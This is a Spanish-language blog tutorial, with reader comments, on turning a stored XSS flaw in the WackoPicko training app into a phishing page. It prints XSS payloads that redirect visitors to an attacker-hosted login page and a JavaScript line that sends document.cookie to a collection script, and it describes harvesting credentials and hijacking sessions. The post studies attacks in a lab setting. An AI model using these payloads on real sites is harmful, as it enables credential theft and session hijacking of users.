Hace un tiempo que no he podido publicar pero uno también tiene que atender sus responsabilidades =D como se suele decir, lo bueno se hace de rogar.
En el blog ya tenemos un par de pruebas de concepto de cómo montar un phishing, ya sea SET o con el framework phishing frenzy todo empleando software especializado. En este post, se va aprovechar una vulnerabilidad de XSS para desarrollar un phishing.
Para ello, como siempre se va a emplear un escenario controlado, ya sabéis hay jugar pero sin meterse en líos. En este caso, se ha empleado la aplicación web WackoPicko, que se encuentran dentro del proyecto OWASP Broken Web APP
Se trata de la típica aplicación que nos podemos encontrar que tiene un buscador de productos. Normalmente cuando veamos algo así, nos entra mono de probar si puede ser vulnerable a un XSS o SQL Injection,pues vamos a ello!
En la barra de buscador se podría intentar incrustar código script. Como prueba de concepto para detectar si el sitio web es vulnerable se introduce el típico código:
<script>alert(“XSS”)</script>
Entonces por partes, en primer lugar, insertarmos el código del XSS persistente:
'><script>document.location="http://172.16.1.2/login.html";</script>
A continuación el código del HTML (login.html) que se basa en copiar el código pero no nos descargamos las fuentes sino que las llamamos mediante peticiones.
De tal manera, que el usuario que se vaya al buscador, se le redirige a la página del phishing:
En el fichero HTML (login.html), se está recogiendo las fuentes de la página inicial lo cual tiene dos implicaciones, una de rendimiento que es muy óptimo la página no tarda nada en cargarse, lo cual no levanta sospechosas al usuario, mientras que la segunda desde el punto de vista de la seguridad no es adecuada hacer peticiones a los recursos de un sitio web si estás tratando de usurparlo, esta actividad levanta muchas sospechas.
Se ha creado el fichero login.html pues ahí se encuentra cargado el servidor Apache y el intérprete de PHP.
Lo que se pretende con este phishing es dos objetivos:
- Robo de credenciales.
- Robo de cookies de usuarios autenticados.
Es posible que algún usuario se encuentra autenticado y al entrar en el buscador directamente nos podemos hacer con su cookie sin necesidad de que introduzca sus credenciales.
Para ello, se crean dos pequeños scripts:
- takelogin.php
- takecookie.php
En el panel de login, en el form se llama mediante el action POST al fichero takelogin.php
Recoge el username y password. Para que no sea visible para la víctima potencial se emplea la función header y se incluye la dirección “verdadera” para que se autentique de nuevo.
En la siguiente captura se observan las peticiones ambos scripts:
Es importante crear manualmente el fichero de texto dónde se van a guardar y sobretodo darle permisos (chmod 777 login.txt).
Y como se ve en el fichero .txt tenemos los credenciales:
Una vez autenticado, se redirige a la página oficial indicando que los datos introducidos son incorrectos:
Para la recogida de cookies en el propio fichero de login.html se incluye el siguiente código JavaScript:
document.write("<img width='0px' height'0px' src='http://localhost/takecookie.php?cookie=" + document.cookie + "'>");
En este se aprovecha el tag de una imagen para incluir una llamada a takecookie.php que recoge la cookie.
El código del script takelogin.php es:
Viendo el fichero de las cookies:
Con el valor de estas cookies, se intentaría usar para loguearse empleado una sesión activa de un usuario, ya sabéis empleando un proxy interceptador.
Y esto es todo, espero que os haya molado ver como aprovechando una vulnerabilidad de XSS se puede montar un phishing de manera manual. Para que luego digan que las vulnerabilidades de XSS son sólo para poner un alert o un defacement =D
Ya sabéis para cualquier ayuda, sugerencia, queja o agradecimiento ahí están los comentarios, usadlos! y estaré encantado de responderlos.
Esta entrada está destinada a fines académicos en entornos controlados sin suponer sin ningún impacto. No nos hacemos responsables de uso para otros fines.
Saludos.
La mejor defensa es un buen ataque.
NaxHack5
Muy buenas,
ResponderEliminarMe surge una duda, el código Javascript se ejecuta en el Navegador del cliente, por lo tanto entiendo que para que esto funcione tienes que tener acceso al mismo e introducir el script?
Lo ideal sería poderlo envía a través de una URL, ¿es posible hacer esto?
Gracias por el aporte!
Buenas Alejandro,
ResponderEliminarGracias por tu comentario.
La página en la que se accede el phishing (login.html) está en posesión del atacante, por lo que ahí se incluye el código JavaScript.
El código JavaScript posibilita dinánismo a una página web, es decir, se encuentra dentro del código, de tal manera que cuando se accede se ejecuta y se carga, lo de enviarlo a través de la url no es posible, no sé muy bien a que te refieres.
Saludos.